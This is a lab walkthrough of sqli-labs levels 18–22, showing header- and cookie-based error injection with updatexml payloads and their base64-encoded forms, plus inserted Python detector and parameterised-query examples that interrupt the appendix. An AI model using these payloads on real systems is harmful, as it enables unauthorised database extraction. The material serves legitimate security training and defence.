These levels are all request-header injection: values recorded from the request headers are concatenated into the SQL statement.
User-Agent: the browser's identification string
Referer: the page the browser came from; think of it as the link on the previous page that brought the browser to the current page
Accept: the response content types (Content-Type) the client will accept
X-Forwarded-For: can be used to indicate the real client IP of an HTTP request
Date: the date and time the message was sent
Level 18
Dump the database name
'and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1),1,1)-- q
Dump table names
' and updatexml (1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'limit 0,1),0x7e),1) -- +
Dump column names
'and updatexml (1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1),1,1) -- +
Dump data
'and updatexml (1,concat(0x7e,(select id from emails limit 0,1),0x7e),1),1,1) -- +
Level 19
Referer injection
Referer injection point
'and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) and '
'and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '
Apart from the injection point, everything is the same as the previous level.
Level 20
Cookie injection
admin'and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)-- q
admin' and updatexml (1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'limit 0,1),0x7e),1) -- +
Level 21
Base64 online encode/decode | Base64 encrypt/decrypt - Base64.us
Base64 encoding
admin 'and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)-- qwe
After base64 encoding
YWRtaW4gJ2FuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoU0VMRUNUIGRhdGFiYXNlKCkpLDB4N2UpLDEpLS0gcXdl
This throws an error. The reason is that special characters such as spaces, hyphens and plus signs are prone to going wrong after encoding, so do not use the comment sequence; use another clause to neutralize the rest of the query instead. The universal closing clause is and '1'='1.
Appendix: analysis of how the single-quote closure works:
Look at the source first
The code in the source:
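The headers listed at the top of this post and the base64-wrapped cookie described here are the inputs a defender has to watch. The following detector is an added example, not code from the post or from sqli-labs: it scans the inspected headers of one logged request for the error-based injection shapes used in these levels, and re-scans any value that is well-formed base64 so that the level 21 wrapping does not hide the payload. The sample requests, the cookie name uname and the IP address are constructed; the two malicious values are the payloads quoted in the post.

```python
import base64
import re
from dataclasses import dataclass

# Request headers these levels splice into SQL (levels 18-19) plus Cookie (levels 20-22).
INSPECTED_HEADERS = ("User-Agent", "Referer", "X-Forwarded-For", "Cookie")

# Indicators of error-based injection, derived from the payload shapes in the walkthrough.
INDICATORS = [
    ("xml-error-function", re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I)),
    ("schema-enumeration", re.compile(r"\binformation_schema\.", re.I)),
    ("quote-then-boolean", re.compile(r"""['"]\s*(and|or)\b""", re.I)),
    ("comment-terminator", re.compile(r"--\s|/\*")),
]


@dataclass
class Finding:
    header: str               # e.g. "User-Agent" or "Cookie:uname"
    indicator: str            # which INDICATORS entry matched
    decoded_from_base64: bool  # True when the hit was in the base64-decoded form
    text: str                 # the text the indicator matched against


def maybe_base64_decode(value: str):
    """Return the decoded text when value is well-formed base64 of printable UTF-8, else None."""
    if len(value) < 8 or len(value) % 4 != 0:
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError subclass
        return None
    return text if text.isprintable() else None


def cookie_values(cookie_header: str):
    """Split 'a=1; b=2' into (name, value) pairs; only the first '=' separates name from value,
    so base64 padding '=' stays part of the value."""
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            yield name.strip(), value.strip()


def scan_headers(headers: dict) -> list:
    """Scan one request's headers and return every indicator hit, raw and base64-decoded."""
    findings = []
    for header in INSPECTED_HEADERS:
        if header not in headers:
            continue
        if header == "Cookie":
            candidates = [(f"Cookie:{n}", v) for n, v in cookie_values(headers[header])]
        else:
            candidates = [(header, headers[header])]
        for label, value in candidates:
            for text, decoded in ((value, False), (maybe_base64_decode(value), True)):
                if text is None:
                    continue
                for name, rx in INDICATORS:
                    if rx.search(text):
                        findings.append(Finding(label, name, decoded, text))
    return findings


# Constructed sample requests; the two malicious values are the payloads quoted in the post.
LEVEL21_COOKIE = ("YWRtaW4gJ2FuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoU0VMRUNUIGRhdGFiYXNlKCkpLDB4N2UpLDEp"
                  "IGFuZCAnMSc9JzE=")
SAMPLE_REQUESTS = [
    {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64)",
     "Referer": "https://shop.example.test/cart",
     "Cookie": "uname=YWRtaW4=; lang=en"},
    {"User-Agent": "'and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) and '",
     "X-Forwarded-For": "203.0.113.7"},
    {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64)",
     "Cookie": f"uname={LEVEL21_COOKIE}"},
]

if __name__ == "__main__":
    for i, req in enumerate(SAMPLE_REQUESTS):
        for f in scan_headers(req):
            print(f"request {i}: {f.header} [{f.indicator}] base64={f.decoded_from_base64}")
```

The benign request produces no findings; the level 19 style User-Agent is flagged in its raw form, and the level 21 cookie is flagged only after decoding, which is the case a filter that looks at raw header bytes would miss.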
$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
The SQL statement we inject
admin 'and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) and '1'='1
The SQL statement after the cookee variable is spliced into the source
$sql="SELECT * FROM users WHERE username=('admin 'and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) and '1'='1') LIMIT 0,1";
The quotes close exactly. OK.
The usual database-name dump: enter the encoded statement in the cookee value
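The splice above, re-traced as an added example (this is not code from the post or from sqli-labs): segments() splits the assembled query the way a SQL parser separates single-quoted literals from code, so it is visible which parts of the cookie land outside the quotes and why the quotes "close exactly", and safe_lookup() shows the same predicate with a bound parameter. The parameterised half uses SQLite, which has no updatexml(); the point it demonstrates is only that a bound value never leaves the literal. The users table and its single row are constructed, and LIMIT 1 stands in for the MySQL LIMIT 0,1.

```python
import sqlite3

# The vulnerable line quoted from the level 21 source; $cookee is the base64-decoded cookie.
VULNERABLE_TEMPLATE = "SELECT * FROM users WHERE username=('{cookee}') LIMIT 0,1"

# The decoded cookie value shown in the post.
INJECTED_COOKIE = "admin 'and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) and '1'='1"


def splice(cookee: str) -> str:
    """Reproduce the string concatenation the PHP source performs."""
    return VULNERABLE_TEMPLATE.format(cookee=cookee)


def segments(sql: str) -> list:
    """Split sql into ('code', text) and ('literal', text) pieces as a SQL parser sees
    single-quoted strings; '' inside a literal is an escaped quote. A literal that is
    never closed is reported as ('unterminated', text)."""
    out, buf, in_literal, i = [], [], False, 0
    while i < len(sql):
        ch = sql[i]
        if in_literal:
            if ch == "'" and sql[i + 1:i + 2] == "'":   # escaped quote inside a literal
                buf.append("'")
                i += 2
                continue
            if ch == "'":                                # closing quote
                out.append(("literal", "".join(buf)))
                buf, in_literal = [], False
            else:
                buf.append(ch)
        elif ch == "'":                                  # opening quote
            if buf:
                out.append(("code", "".join(buf)))
            buf, in_literal = [], True
        else:
            buf.append(ch)
        i += 1
    if buf or in_literal:
        out.append(("unterminated" if in_literal else "code", "".join(buf)))
    return out


def injected_code(cookee: str) -> list:
    """Code segments of the spliced query that the template itself did not contribute,
    i.e. the part of the cookie the parser executes as SQL rather than compares as text."""
    template_code = {t for k, t in segments(splice("")) if k == "code"}
    return [t for k, t in segments(splice(cookee)) if k == "code" and t not in template_code]


def quotes_close(cookee: str) -> bool:
    """True when every quote in the spliced query is matched (the post's 'closes exactly')."""
    return all(k != "unterminated" for k, _ in segments(splice(cookee)))


def safe_lookup(cookee: str):
    """Parameterised form of the same query: the value is bound, never spliced into SQL text."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    conn.execute("INSERT INTO users (username) VALUES ('admin')")  # constructed sample row
    # Same predicate as the template, with a placeholder where '$cookee' used to be.
    row = conn.execute("SELECT id, username FROM users WHERE username = (?) LIMIT 1",
                       (cookee,)).fetchone()
    conn.close()
    return row


if __name__ == "__main__":
    for kind, text in segments(splice(INJECTED_COOKIE)):
        print(f"{kind:12} {text!r}")
    print("injected SQL:", injected_code(INJECTED_COOKIE))
    print("quotes close:", quotes_close(INJECTED_COOKIE))
    print("bound lookup:", safe_lookup(INJECTED_COOKIE))
```

With the injected cookie the parser sees the literal 'admin ', then the updatexml() call and the trailing and as code, then the literals '1' and '1' around a bare =, and finally the template's own ') LIMIT 0,1'; that is the whole reason the and '1'='1 suffix is needed once the comment sequence is off the table. The bound query returns the admin row for the plain name and nothing at all for the injected value, because the quotes in it are data, not syntax.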
admin 'and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) and '1'='1
After base64 encoding
YWRtaW4gJ2FuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoU0VMRUNUIGRhdGFiYXNlKCkpLDB4N2UpLDEpIGFuZCAnMSc9JzE=
successfully!!!
Determine table names
admin 'and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'limit 0,1),0x7e),1) and '1'='1
Encoded
YWRtaW4gJ2FuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IHRhYmxlX25hbWUgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknbGltaXQgMCwxKSwweDdlKSwxKSBhbmQgJzEnPScx
Determine column names
admin 'and updatexml (1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1) and '1'='1
YWRtaW4gJ2FuZCB1cGRhdGV4bWwgKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBjb2x1bW5fbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknIGFuZCB0YWJsZV9uYW1lPSdlbWFpbHMnIGxpbWl0IDAsMSksMHg3ZSksMSkgYW5kICcxJz0nMQ==
Determine data
admin 'and updatexml (1,concat(0x7e,(select id from emails limit 0,1),0x7e),1) and '1'='1
YWRtaW4gJ2FuZCB1cGRhdGV4bWwgKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBpZCBmcm9tIGVtYWlscyBsaW1pdCAwLDEpLDB4N2UpLDEpIGFuZCAnMSc9JzE=
.... END
Level 22
Same as the previous level, except the closure uses double quotes
admin "and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) and "1"="1
After base64 encoding
YWRtaW4gImFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoU0VMRUNUIGRhdGFiYXNlKCkpLDB4N2UpLDEpIGFuZCAiMSI9IjE=
Just follow the same steps
admin "and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'limit 0,1),0x7e),1) and "1"="1
Encoded
YWRtaW4gImFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IHRhYmxlX25hbWUgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknbGltaXQgMCwxKSwweDdlKSwxKSBhbmQgIjEiPSIx
admin "and updatexml (1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1) and "1"="1
Encoded
YWRtaW4gImFuZCB1cGRhdGV4bWwgKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBjb2x1bW5fbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknIGFuZCB0YWJsZV9uYW1lPSdlbWFpbHMnIGxpbWl0IDAsMSksMHg3ZSksMSkgYW5kICIxIj0iMQ==
admin "and updatexml (1,concat(0x7e,(select id from emails limit 0,1),0x7e),1) and "1"="1
Encoded
YWRtaW4gImFuZCB1cGRhdGV4bWwgKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBpZCBmcm9tIGVtYWlscyBsaW1pdCAwLDEpLDB4N2UpLDEpIGFuZCAiMSI9IjE=
END!!!